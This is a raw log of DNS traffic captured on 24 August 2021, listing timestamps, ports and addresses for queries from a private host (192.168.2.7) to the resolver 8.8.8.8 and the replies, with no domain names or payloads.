Aug 24, 2021 08:48:06.496726990 CEST	56647	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:06.630636930 CEST	53	56647	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:06.683919907 CEST	58845	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:06.798604012 CEST	59815	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:06.815541029 CEST	53	58845	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:06.826025963 CEST	53	59815	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:06.848838091 CEST	59847	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:06.881364107 CEST	53	59847	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:06.906260014 CEST	57749	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:06.945261002 CEST	64554	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:06.972543955 CEST	53	64554	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:07.091917038 CEST	53	57749	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:07.197958946 CEST	61143	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:07.225282907 CEST	53	61143	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:07.289974928 CEST	60842	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:07.314491034 CEST	53	60842	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:07.376939058 CEST	54779	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:07.407001019 CEST	53	54779	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:07.433233023 CEST	59794	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:07.575251102 CEST	53	59794	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:07.621295929 CEST	51357	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:07.625211954 CEST	51208	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:07.656285048 CEST	53	51357	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:07.658495903 CEST	53	51208	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:07.884996891 CEST	51174	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:07.919905901 CEST	53	51174	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:08.080835104 CEST	59945	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:08.095005989 CEST	65041	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:08.107785940 CEST	53	59945	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:08.231729031 CEST	53	65041	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:08.280283928 CEST	57300	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:08.294948101 CEST	52702	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:08.323287010 CEST	53	52702	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:08.447251081 CEST	53	57300	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:08.451754093 CEST	62292	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:08.478923082 CEST	53	62292	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:08.621613026 CEST	57453	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:08.643352032 CEST	50131	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:08.654006958 CEST	53	57453	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:08.681607008 CEST	53	50131	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:08.898665905 CEST	52458	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:08.925919056 CEST	55527	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:08.929825068 CEST	53	52458	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:08.964405060 CEST	53	55527	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:09.029788017 CEST	63465	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:09.030323982 CEST	63558	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:09.058667898 CEST	53	63558	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:09.162795067 CEST	53	63465	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:09.367027044 CEST	53192	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:09.786823988 CEST	53	53192	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:09.817342043 CEST	59360	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:09.866084099 CEST	61742	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:09.868391991 CEST	65209	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:09.900641918 CEST	53	65209	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:09.900947094 CEST	53	61742	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:09.925410986 CEST	63727	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:09.951761007 CEST	53	59360	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:10.091897011 CEST	53	63727	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:10.105523109 CEST	58410	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:10.148432016 CEST	53	58410	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:10.163880110 CEST	64692	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:10.192049026 CEST	53	64692	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:10.387548923 CEST	56706	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:10.422494888 CEST	53	56706	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:10.465331078 CEST	57292	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:10.485094070 CEST	59523	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:10.512320995 CEST	53	59523	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:10.533283949 CEST	63896	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:10.633225918 CEST	53	57292	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:10.674869061 CEST	53	63896	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:10.744853020 CEST	63542	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:10.757847071 CEST	63669	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:10.785125017 CEST	53	63669	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:10.799098015 CEST	53	63542	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:11.039514065 CEST	60869	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:11.064080000 CEST	55330	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:11.069756031 CEST	53	60869	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:11.188585997 CEST	53	55330	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:11.230070114 CEST	62095	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:11.379101038 CEST	53	62095	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:11.584208965 CEST	51425	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:11.594069958 CEST	53908	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:11.608654022 CEST	53	51425	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:11.628978968 CEST	53	53908	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:11.702613115 CEST	59692	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:11.719419003 CEST	59268	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:11.735251904 CEST	53	59692	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:11.752006054 CEST	53	59268	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:11.821831942 CEST	55109	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:11.853795052 CEST	53	55109	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:11.881593943 CEST	56973	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:12.025710106 CEST	53	56973	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:12.161679983 CEST	57324	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:12.193788052 CEST	53	57324	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:12.252526045 CEST	49706	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:12.315445900 CEST	49243	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:12.343657970 CEST	58420	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:12.350491047 CEST	53	49243	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:12.369066000 CEST	53	58420	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:12.422174931 CEST	53	49706	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:12.575552940 CEST	64987	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:12.575998068 CEST	49265	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:12.607887030 CEST	53	64987	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:12.607933998 CEST	53	49265	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:12.649391890 CEST	61624	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:12.683248043 CEST	53	61624	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:12.819562912 CEST	59203	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:12.969893932 CEST	53	59203	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:12.997320890 CEST	52211	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:13.023379087 CEST	60943	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:13.050879002 CEST	53	60943	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:13.142889023 CEST	52021	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:13.170875072 CEST	53	52021	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:13.180865049 CEST	53	52211	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:13.541888952 CEST	58729	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:13.570244074 CEST	58851	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:13.576802015 CEST	53	58729	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:13.624125957 CEST	53	58851	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:13.661128044 CEST	60616	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:13.673722029 CEST	58996	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:13.698069096 CEST	53	58996	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:13.856898069 CEST	53	60616	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:14.156769991 CEST	54973	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:14.188847065 CEST	53	54973	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:14.218213081 CEST	61763	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:14.220727921 CEST	62909	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:14.220829964 CEST	64741	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:14.245166063 CEST	53	64741	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:14.247737885 CEST	53	62909	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:14.251533031 CEST	53	61763	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:14.411966085 CEST	50407	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:14.439094067 CEST	53	50407	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:14.669918060 CEST	62986	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:14.698378086 CEST	53	62986	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:14.865398884 CEST	49766	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:14.890057087 CEST	53	49766	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:15.181423903 CEST	62446	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:15.205718040 CEST	53	62446	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:15.399323940 CEST	53676	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:15.436443090 CEST	53	53676	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:15.476702929 CEST	57039	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:15.486115932 CEST	49490	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:15.508896112 CEST	53	57039	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:15.510587931 CEST	53	49490	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:15.720777988 CEST	62090	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:15.747951031 CEST	53	62090	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:15.813241005 CEST	61324	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:15.848124981 CEST	53	61324	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:15.886044979 CEST	61687	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:15.918231964 CEST	53	61687	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:16.085262060 CEST	50018	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:16.103138924 CEST	52627	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:16.112005949 CEST	53	50018	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:16.133090019 CEST	53	52627	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:16.348051071 CEST	63422	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:16.355648994 CEST	57172	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:16.373625040 CEST	53	63422	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:16.381375074 CEST	53	57172	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:16.673012972 CEST	55675	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:16.705719948 CEST	53	55675	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:16.757494926 CEST	50160	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:16.770612001 CEST	63278	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:16.790652990 CEST	53	50160	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:16.795279026 CEST	53	63278	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:16.868834019 CEST	53456	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:16.893237114 CEST	53	53456	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:17.208261013 CEST	63658	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:17.271505117 CEST	53	63658	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:17.342351913 CEST	51348	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:17.346602917 CEST	52612	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:17.399097919 CEST	53	51348	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:17.597327948 CEST	53	52612	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:17.836889982 CEST	62733	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:17.838850021 CEST	49854	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:17.865994930 CEST	53	49854	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:17.880157948 CEST	53	62733	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:18.471353054 CEST	60427	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:18.472073078 CEST	54191	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:18.495646954 CEST	53	60427	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:18.496419907 CEST	53	54191	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:19.123662949 CEST	58818	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:19.162013054 CEST	53	58818	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:19.287771940 CEST	63104	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:19.322524071 CEST	53	63104	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:19.465039015 CEST	64210	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:19.493597031 CEST	53	64210	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:20.887794971 CEST	51500	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:20.912573099 CEST	53	51500	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:21.404436111 CEST	56113	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:21.404474974 CEST	62880	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:21.432351112 CEST	53	62880	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:21.437783957 CEST	53	56113	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:21.698936939 CEST	54594	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:21.723285913 CEST	53	54594	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:22.083018064 CEST	50721	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:22.107409000 CEST	53	50721	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:22.306983948 CEST	61849	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:22.334165096 CEST	53	61849	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:22.584141970 CEST	58610	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:22.608431101 CEST	53	58610	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:22.924045086 CEST	59980	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:22.937241077 CEST	65402	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:22.949594975 CEST	53	59980	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:23.084945917 CEST	53	65402	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:23.120373964 CEST	54345	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:23.202584028 CEST	51077	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:23.226927042 CEST	53	51077	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:23.256073952 CEST	53	54345	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:23.430375099 CEST	63899	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:23.454895973 CEST	53	63899	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:23.606734037 CEST	62217	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:23.641870022 CEST	53	62217	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:23.715203047 CEST	52406	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:23.717617989 CEST	63064	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:23.747838020 CEST	53	52406	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:23.750087023 CEST	53	63064	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:23.942255974 CEST	54717	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:23.974272013 CEST	53	54717	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:23.994752884 CEST	59519	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:24.164736032 CEST	53	59519	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:24.357857943 CEST	61953	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:24.385102034 CEST	53	61953	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:24.544178963 CEST	63764	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:24.568584919 CEST	53	63764	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:24.590845108 CEST	62044	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:24.630310059 CEST	53	62044	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:24.676736116 CEST	55165	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:24.870383978 CEST	53	55165	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:24.921580076 CEST	55644	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:24.946305037 CEST	53	55644	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:25.091562986 CEST	55126	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:25.125139952 CEST	53	55126	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:25.169748068 CEST	63299	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:25.212840080 CEST	53	63299	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:25.305867910 CEST	56060	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:25.428105116 CEST	55834	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:25.461543083 CEST	53	55834	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:25.473572969 CEST	53	56060	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:25.612881899 CEST	49933	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:25.647696972 CEST	53	49933	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:25.715383053 CEST	52072	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:25.749033928 CEST	53	52072	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:25.796987057 CEST	49939	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:25.833435059 CEST	53	49939	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:25.883907080 CEST	64208	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:25.895930052 CEST	62102	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:25.928013086 CEST	53	62102	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:25.954981089 CEST	64043	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:25.987215996 CEST	53	64043	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:26.050658941 CEST	53	64208	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:26.160240889 CEST	57944	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:26.184608936 CEST	53	57944	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:26.282202005 CEST	64085	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:26.317349911 CEST	53	64085	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:26.373648882 CEST	58752	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:26.409360886 CEST	53	58752	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:26.427387953 CEST	55661	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:26.439846992 CEST	51837	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:26.462579966 CEST	53	55661	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:26.472073078 CEST	53	51837	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:26.795943022 CEST	60743	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:26.820322037 CEST	53	60743	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:26.934576035 CEST	60442	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:27.086328983 CEST	53	60442	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:27.116136074 CEST	53758	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:27.128072977 CEST	49431	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:27.151339054 CEST	53	53758	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:27.319612980 CEST	53	49431	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:27.346900940 CEST	51482	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:27.393124104 CEST	51486	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:27.394237041 CEST	63357	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:27.428102970 CEST	53	51486	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:27.429102898 CEST	53	63357	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:27.493520021 CEST	53	51482	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:27.573848009 CEST	65213	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:27.703236103 CEST	53	65213	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:27.746990919 CEST	50770	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:27.770092964 CEST	61688	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:27.805567980 CEST	53	61688	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:27.811111927 CEST	58182	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:27.845654011 CEST	53	58182	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:27.888428926 CEST	56057	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:27.913829088 CEST	53	50770	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:27.939105034 CEST	56942	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:27.972454071 CEST	53	56942	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:28.055212975 CEST	53	56057	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:28.137923002 CEST	52797	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:28.169995070 CEST	53	52797	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:28.294137955 CEST	59084	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:28.443564892 CEST	53	59084	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:28.475513935 CEST	54319	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:28.488331079 CEST	50661	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:28.499803066 CEST	53	54319	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:28.503595114 CEST	60591	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:28.504132032 CEST	53735	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:28.504848957 CEST	55961	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:28.529567957 CEST	53	50661	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:28.530795097 CEST	53	60591	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:28.536135912 CEST	53	53735	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:28.552052975 CEST	53	55961	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:28.585556030 CEST	63975	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:28.721726894 CEST	65315	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:28.747070074 CEST	53	65315	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:28.774693012 CEST	53	63975	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:28.840090036 CEST	60994	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:28.875802040 CEST	53	60994	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:29.270356894 CEST	57973	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:29.450454950 CEST	53	57973	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:29.524123907 CEST	62438	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:29.536858082 CEST	57930	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:29.537687063 CEST	61312	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:29.561271906 CEST	53	57930	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:29.561862946 CEST	53	61312	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:29.691363096 CEST	53	62438	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:29.722112894 CEST	63377	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:29.746506929 CEST	53	63377	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:29.806221962 CEST	49192	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:29.995203972 CEST	53	49192	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:30.021198034 CEST	64642	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:30.056286097 CEST	53	64642	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:30.114079952 CEST	50297	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:30.139650106 CEST	53	50297	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:30.322211027 CEST	58633	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:30.346658945 CEST	53	58633	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:30.412621975 CEST	53259	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:30.478796005 CEST	53	53259	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:30.508426905 CEST	51431	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:30.674909115 CEST	53	51431	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:31.095408916 CEST	65495	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:31.132886887 CEST	53	65495	8.8.8.8	192.168.2.7
Aug 24, 2021 08:48:31.153666973 CEST	65176	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:31.315609932 CEST	51123	53	192.168.2.7	8.8.8.8
Aug 24, 2021 08:48:31.321997881 CEST	53	65176	8.8.8.8	192.168.2.7
